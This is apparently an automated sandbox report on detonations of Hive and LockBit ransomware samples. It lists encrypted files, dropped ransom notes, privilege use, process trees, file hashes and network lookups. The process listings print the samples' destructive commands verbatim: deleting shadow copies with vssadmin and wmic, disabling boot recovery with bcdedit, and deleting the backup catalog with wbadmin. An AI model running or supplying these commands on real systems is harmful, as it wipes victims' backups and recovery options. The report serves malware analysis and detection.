File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\SmartTagInstall.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar.2bFe2RNXl41EgVSI0NCD787SOSDduxMSY-ODBH1GVU4.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize.2bFe2RNXl41EgVSI0NCD70cbcmWKSv95Fbwb9O0qNGc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Globalization\MCT\MCT-ZA\RSSFeed\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_32\System.Transactions\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.IO.Log\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Web.Extensions.Design.resources\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\ehexthost\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Globalization\ELS\Transliteration\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel\v4.0_4.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Resources\Themes\Aero\Shell\NormalColor\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_32\mcstoredb\6.1.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Core.resources\3.5.0.0_es_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Help\mui\0C0A\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Instrumentation\v4.0_4.0.0.0__b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Speech\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks.resources\2.0.0.0_it_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Web.RegularExpressions\2.0.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\IME\IMEJP10\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Media\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Web.Extensions.Design.resources\3.5.0.0_es_31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Boot\PCAT\zh-CN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Help\Windows\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1046\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Primitives\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Resources\Themes\Aero\Shell\NormalColor\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.Commands.UpdateDiagRootcause.Resources\1.0.0.0_de_31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\PresentationBuildTasks.resources\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Branding\Basebrd\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Workflow.Activities\3.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Data.DataSetExtensions\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v3.5\SQL\EN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1032\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Editor.Resources\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Web.Routing.resources\3.5.0.0_de_31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\CSC\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_64\System.Printing\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Web.Abstractions\3.5.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Web.Services.resources\2.0.0.0_de_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Globalization\MCT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\Fonts\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Globalization\MCT\MCT-ZA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_64\System.EnterpriseServices\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\system.management.resources\2.0.0.0_de_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Panther\setup.exe\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessData.Intl\14.0.0.0__71e9bce111e9429c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_ja_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v3.5\es\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\MUI\040C\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.CompilerServices.VisualC\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks.resources\2.0.0.0_fr_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Data.Services.Design\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.Windows.Presentation.resources\3.5.0.0_ja_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\LiveKernelReports\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Boot\EFI\cs-CZ\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.DurableInstancing\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.OneNote\12.0.0.0__71e9bce111e9429c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Browser Information Discovery

discovery

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 760 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 760 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 2120 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2736 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2120 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2156 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2120 wrote to memory of 2972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

C:\Windows\system32\cmd.exe

cmd /c hive.bat >NUL 2>NUL

C:\Windows\system32\cmd.exe

cmd /c shadow.bat >NUL 2>NUL

C:\Windows\system32\timeout.exe

timeout 1

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/760-0-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-1-0x00000000001F0000-0x00000000004C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat

MD5 6358d970c3edccb57eae7dbf9f42d58f
SHA1 25b994c3b5604f4f67e1ac6250bc2f14ce690380
SHA256 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50
SHA512 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat

MD5 df5552357692e0cba5e69f8fbf06abb6
SHA1 4714f1e6bb75a80a8faf69434726d176b70d7bd8
SHA256 d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8
SHA512 a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d

C:\$Recycle.Bin\S-1-5-21-2212144002-1172735686-1556890956-1000\desktop.ini

MD5 2adc92efc54016e58eabc4fa55f131b1
SHA1 ffd5c3a7904ae370886a98330cc5675b99ee2c3f
SHA256 9bda481b38e6f4f1063bceda964fd68f1ffd7683c192de8d0755965791d8e27f
SHA512 7f0de144ea93cfae002ed5adb4efb3b7e57f6526cffd055b676130c832e44b27c1889df9c928ab8029cd14876dfdec884e417f8ffab8e1ac6d1e091a55aa9bbc

memory/760-42-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-272-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-944-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-1876-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-2807-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-3547-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-3931-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4303-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4304-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4305-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-4306-0x00000000001F0000-0x00000000004C9000-memory.dmp

C:\$Recycle.Bin\HOW_TO_DECRYPT.txt

MD5 ee4ad142674725d6d9b58c9c3bb836dc
SHA1 ac9bac37131c72a549d2bf3fbd233061906d5fab
SHA256 fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776
SHA512 a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3

memory/760-4873-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-8793-0x00000000001F0000-0x00000000004C9000-memory.dmp

memory/760-10792-0x00000000001F0000-0x00000000004C9000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

151s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3442) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Drops file in Program Files directory


Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
